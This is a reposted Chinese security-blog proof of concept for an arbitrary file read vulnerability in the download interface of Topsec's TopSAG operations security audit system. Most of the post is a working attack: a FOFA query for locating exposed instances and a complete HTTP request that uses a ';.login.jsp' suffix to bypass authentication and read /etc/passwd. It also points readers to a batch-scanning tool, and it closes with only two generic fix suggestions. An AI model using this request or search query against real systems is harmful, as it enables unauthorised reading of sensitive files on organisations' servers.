天融信运维安全审计系统download接口处存在任意文件读取漏洞 PoC

admin 2024年11月4日11:15:11评论33 views字数 770阅读2分34秒阅读模式
简介
天融信运维安全审计系统TopSAG是一款基于自主知识产权的NGTOS安全操作系统平台研发的创新型安全管理工具,融汇了多年网络安全防护的经验。该系统以4A管理原则为基础,核心是安全代理,确保运维过程中的安全措施得以有效实施。TopSAG提供事前预防、事中监控和事后审计的全面安全解决方案,帮助企业主动防范潜在威胁,实时监控和追踪审计。
漏洞描述

天融信运维安全审计系统在download接口处存在任意文件读取漏洞。

fofa语法
header="iam" && server="Apache-Coyote/"
漏洞复现
POST /iam/download;.login.jsp HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-siteContent-Length: 67filename=1.txt&filepath=/etc/passwd

天融信运维安全审计系统download接口处存在任意文件读取漏洞 PoC

批量检测(批量检测POC工具请在公众号知识星球获取):

天融信运维安全审计系统download接口处存在任意文件读取漏洞 PoC

天融信运维安全审计系统download接口处存在任意文件读取漏洞 PoC
修复建议
1、防火墙添加临时黑名单规则
2、联系厂商打补丁或升级版本

原文始发于微信公众号(白帽攻防):【漏洞复现】天融信运维安全审计系统download接口处存在任意文件读取漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月4日11:15:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   天融信运维安全审计系统download接口处存在任意文件读取漏洞 PoChttps://cn-sec.com/archives/3352631.html

发表评论

匿名网友 填写信息